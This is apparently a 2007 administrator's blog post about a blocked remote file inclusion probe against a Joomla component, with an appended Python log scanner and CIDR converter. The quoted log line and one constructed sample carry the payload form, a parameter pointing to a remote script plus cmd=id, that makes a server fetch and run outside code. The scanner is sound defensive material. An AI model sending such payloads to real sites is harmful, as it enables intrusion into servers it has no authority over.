The logs showed up another attempted exploit, very similar to the one in New Hack Attempt:
88.242.239.182 - - [27/May/2007:18:40:29 +0100] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://xyu.phpnet.us/xyu.dat?&list=1&cmd=id HTTP/1.0" 403 327 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
phpnet.us, which provides the hosting, does not give a direct way for unregistered users to contact them regarding abuse, but I have used the registered email address at hostorgadmin@googlemail.com to let phpnet.us know that their service is being used by script kiddies.
The originating IP address belongs to the familiar TurkTelekom, who seem to have become the home of some script kiddies.
inetnum: 88.242.64.0 - 88.242.255.255
netname: TurkTelekom
descr: TT ADSL-alcatel dynamic_aci
As usual, their abuse account bounced the complaint.
It looks like another of their IP ranges will have to be blocked.
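A check for requests like the one logged above, added here as an example and not part of the original post: it flags any query parameter whose value is itself a URL, and converts the whois inetnum range into the CIDR blocks a block rule needs. The function names and the second and third sample lines are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

# Apache combined log format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# A query parameter whose value is itself a URL is the mark of a remote file inclusion probe.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)

def rfi_findings(line):
    """Return one (ip, status, path, param, value) tuple per URL-valued parameter."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
    return [
        (m.group("ip"), int(m.group("status")), parts.path, name, value)
        for name, value in parse_qsl(parts.query, keep_blank_values=True)
        if REMOTE_URL_RE.match(value)
    ]

def range_to_cidrs(first, last):
    """Turn a whois inetnum range into the CIDR blocks a firewall rule needs."""
    nets = ipaddress.summarize_address_range(
        ipaddress.ip_address(first), ipaddress.ip_address(last))
    return [str(n) for n in nets]

# First line is the request quoted in the post; the other two are constructed.
SAMPLE_LOG = [
    '88.242.239.182 - - [27/May/2007:18:40:29 +0100] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://xyu.phpnet.us/xyu.dat?&list=1&cmd=id HTTP/1.0" 403 327 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"',
    '192.0.2.10 - - [27/May/2007:18:41:02 +0100] "GET /index.php?mosConfig_absolute_path=http%3A%2F%2Fexample.invalid%2Fx.txt%3F HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [27/May/2007:18:42:15 +0100] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 8211 "-" "-"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for ip, status, path, param, value in rfi_findings(line):
            # 2xx means the script ran and needs review; 403 means it was refused
            print(f"{ip} status={status} {path} {param}={value}")
    print(range_to_cidrs("88.242.64.0", "88.242.255.255"))
```

A legitimate parameter that carries a URL, such as a redirect target, will also match, so review hits by path and status before blocking on them.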

